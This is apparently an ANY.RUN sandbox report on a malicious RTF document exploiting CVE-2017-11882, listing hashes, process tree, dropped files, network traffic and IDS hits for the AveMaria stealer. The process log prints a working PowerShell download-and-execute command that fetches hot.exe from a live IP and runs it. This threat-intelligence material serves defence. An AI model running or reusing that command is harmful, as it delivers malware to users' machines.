analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

hot.doc

Full analysis: https://app.any.run/tasks/89124e41-2260-4579-9612-5938d7461470
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: January 23, 2019, 10:59:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
opendir
trojan
Indicators:
MIME: text/rtf
File info: Rich Text Format data, unknown version
MD5:

B8F97135708C749A17BE33AAC12E2B52

SHA1:

19C875C65EE1DE45E37F03D9ECA6BCD4B1BE1F11

SHA256:

D93694D1E7E1144F4B97A974CB09B637D3F21CF3C51A2F13EA37BAE70F63D3CC

SSDEEP:

1536:fpjqa5AIy6G/TDekemNOvnmPrg3TIYerDssK:fpjqvIy6G/TCkeHnmPrg3TIYePO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1104)
    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 1104)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2760)
    • Downloads executable files from IP

      • powershell.exe (PID: 3904)
    • Application was dropped or rewritten from another process

      • fdfsdfdssdfdfrwtwr4t.exe (PID: 3836)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3904)
  • SUSPICIOUS

    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 1104)
      • powershell.exe (PID: 3904)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 1104)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 4040)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3904)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3036)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3036)
    • Reads internet explorer settings

      • mshta.exe (PID: 4040)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe mshta.exe no specs cmd.exe no specs powershell.exe fdfsdfdssdfdfrwtwr4t.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3036"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\hot.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1104"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
4040"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Roaming\jbkgvgviyufufuifyuf.hta" C:\Windows\System32\mshta.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2760"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://194.36.173.46/hot.exe','%temp%\fdfsdfdssdfdfrwtwr4t.exe'); Start '%temp%\fdfsdfdssdfdfrwtwr4t.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3904powershell (new-object System.Net.WebClienT).DownloadFile('http://194.36.173.46/hot.exe','C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe'); Start 'C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3836"C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe" C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exepowershell.exe
User:
admin
Company:
Simon Tatham
Integrity Level:
MEDIUM
Description:
SSH, Telnet and Rlogin client
Version:
Release 0.64
Total events
1 904
Read events
1 476
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
3036WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE989.tmp.cvr
MD5:
SHA256:
3904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UH20U93UO7IKV646SZ5M.temp
MD5:
SHA256:
1104EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\hot[1].htahtml
MD5:0C6C75565012A2417813EF412CB361AD
SHA256:CB25CD3B7ECAE3ADF76C77A07914EE644394A1EB518D574A9A0FB98C68C8A78C
3904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f8ac.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3036WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F5BAEDB7EE75A214F9DB82C09081C1BC
SHA256:7E10CBAD76460568F638B5846F4742724B0DEF30A8D2D585CDEDC1791B831CE4
3036WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:711620052CBA7D305F7A35BCF7899F3D
SHA256:ADF4709C6535685406B881B19039B0FA7010A03677C78BE7E3EE7FDDB2BFEAB4
3036WINWORD.EXEC:\Users\admin\Desktop\~$hot.docpgc
MD5:CAC541D0457EDCCBC92DCA1E65B48384
SHA256:C43D76F7C81A22B8A3F34D12AA4F07BD81096FDF4F1DBC207BD57001D7C3F63B
1104EQNEDT32.EXEC:\Users\admin\AppData\Roaming\jbkgvgviyufufuifyuf.htahtml
MD5:0C6C75565012A2417813EF412CB361AD
SHA256:CB25CD3B7ECAE3ADF76C77A07914EE644394A1EB518D574A9A0FB98C68C8A78C
3904powershell.exeC:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exeexecutable
MD5:CDDC418FDDAFE573D81CE86E662EB190
SHA256:3BEB81A99AC33C8B6AC9A6960638EB69AD830B01D7F1FA72156B1DFFEAF22462
3036WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\hot.doc.LNKlnk
MD5:53D5A0E6D3F02E740AC77FBB8619A93A
SHA256:07816C034E5A203DFB20F6877F5BA05FD41A083F82C0D0A9E47A7ECCA33C2B82
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1104
EQNEDT32.EXE
GET
200
194.36.173.46:80
http://194.36.173.46/hot.hta
unknown
html
1.12 Kb
malicious
3904
powershell.exe
GET
200
194.36.173.46:80
http://194.36.173.46/hot.exe
unknown
executable
121 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
216.170.112.142:5200
ColoCrossing
US
malicious
1104
EQNEDT32.EXE
194.36.173.46:80
malicious
3904
powershell.exe
194.36.173.46:80
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
1104
EQNEDT32.EXE
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
1104
EQNEDT32.EXE
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
1104
EQNEDT32.EXE
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
3904
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3904
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3904
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3904
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3904
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3904
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
A Network Trojan was detected
MALWARE [PTsecurity] Stealer.Win32.AveMaria
3 ETPRO signatures available at the full report
No debug info